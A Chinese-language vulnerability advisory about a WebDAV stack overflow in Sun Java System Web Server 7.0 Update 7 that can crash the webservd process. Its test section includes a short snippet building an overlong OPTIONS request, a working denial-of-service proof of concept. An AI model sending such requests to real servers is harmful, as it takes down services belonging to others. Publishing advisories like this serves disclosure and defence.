漏洞起因
边界条件错误
危险等级
中
影响系统
Sun Java System Web Server 7.0 Update 7
不受影响系统
危害
远程攻击者可以利用该漏洞使应用程序崩溃。
攻击所需条件
攻击者必须访问Sun Java System Web Server。
漏洞信息
Sun Java System Web Server是一款基于Java的WEB服务程序。
Sun Java System Web Server WEBDAV组件存在一个栈溢出错误,远程攻击者可以利用漏洞使’webservd’进程崩溃,造成拒绝服务攻击。
测试方法
用户可发送如下请求报文:
s="OPTIONS "
s+="/my_dav_directory/" # DAV URI: dav support should be enabled for this directory
s+="A"*500
s+=" HTTP/1.0\n\n"
厂商解决方案
目前没有解决方案提供:
http://wwws.sun.com/software/products/web_srvr/home_web_srvr.html
漏洞提供者
Intevydis
0 条评论。